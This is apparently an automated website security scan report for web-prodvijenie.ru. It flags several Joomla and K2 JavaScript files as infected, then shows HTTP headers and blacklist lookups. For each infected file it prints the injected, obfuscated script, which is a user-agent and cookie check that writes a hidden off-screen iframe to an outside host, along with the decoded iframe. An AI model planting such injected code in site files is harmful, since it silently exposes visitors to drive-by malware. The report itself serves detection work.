Scanned pages/files
Request | Server response | Status |
http://web-prodvijenie.ru/ | 200 OK Content-Length: 27635 Content-Type: text/html | clean |
http://web-prodvijenie.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 98437 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/media/system/js/core.js | 200 OK Content-Length: 6859 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/media/system/js/modal.js | 200 OK Content-Length: 11807 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' !1):this.asset},string:function(a){return a}});SqueezeBox.handlers.url=SqueezeBox.handlers.ajax;SqueezeBox.parsers.url=SqueezeBox.parsers.ajax;SqueezeBox.parsers.adopt=SqueezeBox.parsers.clone; Antivirus reports:
| ||
http://web-prodvijenie.ru//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/ | 500 Internal Server Error Content-Length: 878 Content-Type: text/html | clean |
http://web-prodvijenie.ru/test404page.js | 404 Not Found Content-Length: 518 Content-Type: text/html | clean |
http://web-prodvijenie.ru/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 2422 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf'); if (cookie == undefined) { setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804); document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://oil.pesclubamerica.com/hrejerkthfeh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>'); } }; })(); var $K2 = jQuery.noConflict(); Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://web-prodvijenie.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 9398 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://web-prodvijenie.ru/media/system/js/caption.js | 200 OK Content-Length: 2804 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 240406 Content-Type: application/javascript | clean |
http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/dropdownMenu.js | 200 OK Content-Length: 6613 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' sfHover = function() { var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li"); for (var i = 0; i<sfEls.length; ++i) { sfEls[i].onmouseover = function() { this.className += " sfhover"; } sfEls[i].onmouseout = function() { this.className = this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); } Decoded script: function () { var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li"); for (var i = 0; i < sfEls.length; ++i) { sfEls[i].onmouseover = function () {this.className += " sfhover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfhover\\b"), "");}; } } <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/otscript.js | 200 OK Content-Length: 4862 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' { var topboxes = $$('div.ot-topboxes div.otRounded-mid'); var maxHeight = 0; topboxes.each(function(item, index) { var height = parseInt(item.getStyle('height')); if(height > maxHeight) { maxHeight = height; } }); topboxes.setStyle('height', maxHeight + 'px'); } window.addEvent ('load', function() { equaHeightTopBox(); }); Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://web-prodvijenie.ru/modules/mod_ot_scroller/js/jquery.tools.min.js | 200 OK Content-Length: 12310 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' Decoded script: <iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://web-prodvijenie.ru//vk.com/js/api/openapi.js?60/ | 404 Not Found Content-Length: 528 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: web-prodvijenie.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 15:17:49 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7bad5c47e51dd58e24bbe2681002a0ee=a358e8334c06b69a9a299009c31c9a19; path=/
X-Logged-In: False
X-Powered-By: PHP/5.3.17
GET / HTTP/1.1
Host: web-prodvijenie.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 15:17:49 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7bad5c47e51dd58e24bbe2681002a0ee=a358e8334c06b69a9a299009c31c9a19; path=/
X-Logged-In: False
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-prodvijenie.ru
Referer: http://www.google.com/search?q=web-prodvijenie.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: web-prodvijenie.ru
Referer: http://www.google.com/search?q=web-prodvijenie.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web-prodvijenie.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web-prodvijenie.ru/
Result: web-prodvijenie.ru is not infected or malware details are not published yet.
Result: web-prodvijenie.ru is not infected or malware details are not published yet.